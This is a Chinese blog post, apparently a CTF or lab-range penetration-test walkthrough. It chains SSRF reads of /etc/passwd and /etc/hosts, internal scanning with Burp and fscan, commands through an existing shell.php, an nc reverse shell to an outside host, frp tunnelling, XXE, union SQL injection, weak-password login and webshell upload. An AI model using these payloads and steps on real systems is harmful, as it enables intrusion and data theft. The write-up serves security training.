渗透测试案例

靶场

测试

file:///etc/passwd

获取网站的内网地址

file:///etc/hosts

获取flag

file:///flag

XSS

<script>alert(123)</script>

2、使用BP进行抓包爆破,功能类似于扫描内网了,获取了同网段的几个存活网站。

修改url=file%3A%2F%2F%2Fetc%2Fhosts为url=192.168.0.1

send to intruder修改“1”为变量

192.168.0.10的网站显示被黑了

测试是shell.php文件

http://192.168.0.10/shell.php

可以使用cmd执行命令http://192.168.0.10/shell.php?cmd=ls,找到flag

查看flag,http://192.168.0.10/shell.php?cmd=cat flag

3、查看网站目录http://192.168.0.10/shell.php?cmd=ls / 又看到一个flag

查看看个flag,http://192.168.0.10/shell.php?cmd=cat /flag

4、通过http://192.168.0.10/shell.php?cmd=nc xx.xx.xx.xx PORT -e /bin/sh反弹shell

之后,上传fscan对内网进行扫描,由于权限问题,在使用fscan的时候要加上np参数。

使用ssrf还是有些不方面,使用frp做个内网的穿透,记住网站服务器是frpc端,自己的VPS是frps端

这样挂上frp的socks代理就可以本机访问内网了,

结合fscan的结果对内网进行继续渗透,

http://192.168.0.250这个网站,用burp查看数据包的时候,顺便扫描了一下,结果发现存在xxe。

对网站的两个位置进行获取,获取了两个flag

flag{e69bffb4798654f32af867a884d90f9c}

flag{53a45639120b277af78afd63ff157d07}

对192.168.0.138网站进行渗透,发现是一个存在联合注入的网站,直接通过查询得到flag。

对192.168.0.0网段进行探测,没有新的发现了,试试了10段,发现了新的网站

通过弱口令可以登录后台

在文件管理这个地方,可以直接上传木马,这里直接上传了一个小马

获取相关flag

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QYpiying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值